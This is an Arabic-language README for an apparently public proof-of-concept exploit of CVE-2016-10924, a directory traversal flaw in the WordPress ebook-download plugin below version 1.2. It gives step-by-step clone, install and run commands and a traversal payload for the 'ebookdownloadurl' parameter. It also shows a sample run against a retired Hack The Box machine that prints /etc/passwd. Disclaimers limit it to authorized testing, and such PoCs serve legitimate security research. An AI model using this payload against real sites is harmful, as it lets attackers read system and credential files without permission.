
سكريبت إثبات المفهوم (PoC) لاستغلال ثغرة اجتياز الدليل (CVE-2016-10924) الموجودة في إضافة ووردبريس ebook-download (الإصدارات الأقل من 1.2). تسمح هذه الثغرة بقراءة ملفات غير مصرح بها عبر طلب GET معدّ.
يحتوي هذا المستودع على نص برمجي لإثبات المفهوم (PoC) لاستغلال ثغرة اجتياز الدليل (CVE-2016-10924) الموجودة في إضافة ووردبريس ebook-download (الإصدارات الأقدم من 1.2).
تسمح هذه الثغرة بقراءة ملفات غير مصرح بها عبر طلب GET مخصص. يستغل النص البرمجي معلمة تسمى ebookdownloadurl لاجتياز الأدلة على الخادم المستهدف.
ebook-download للإصدارات < 1.2 لووردبريس/etc/passwd، عن طريق التلاعب بمسار الملف في معلمة ebookdownloadurl.ملاحظة: هذا الإثبات للأغراض التعليمية والاختبار المصرح به فقط. قد يؤدي سوء استخدام هذه المعلومات إلى عواقب قانونية.
requests (يتم تثبيتها عبر pip install requests)استنساخ المستودع:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
تثبيت التبعيات:
pip install requests
تشغيل النص البرمجي:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
تحديد مسار الملف المراد قراءته: بعد تشغيل النص البرمجي، سيُطلب منك إدخال مسار ملف. على سبيل المثال:
../../../../../../../../../etc/passwd
قد تحتاج إلى تعديل عدد ../ بناءً على موقع جذر الويب في البيئة المستهدفة.
الخروج:
exit أو quit أو اضغط على Enter في موجه فارغ للخروج.استخدمت هذا الاستغلال على جهاز "Backdoor"، وهو جهاز متقاعد من Hack The Box:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] أدخل مسارات الملفات (مثال: ../../../../../etc/passwd). اكتب 'exit' للخروج.
أدخل مسار الملف: ../../../../../../../../../etc/passwd
[*] الرابط المستهدف: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] رمز الحالة: 200
[+] محتوى الملف:
root:x:0:0:root:/root:/bin/bash
...
هذا المشروع مخصص حصراً للأغراض التعليمية والاختبار الأمني المشروع.
لا تستخدم المعلومات أو النصوص البرمجية الموجودة في هذا المستودع على أي نظام ليس لديك إذن صريح لاختباره.
المؤلف والمساهمون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
هذا المشروع مرخص بموجب رخصة GNU 2.0. يمكنك استخدامه وتعديله بحرية، مع ذكر المصدر.
المراجع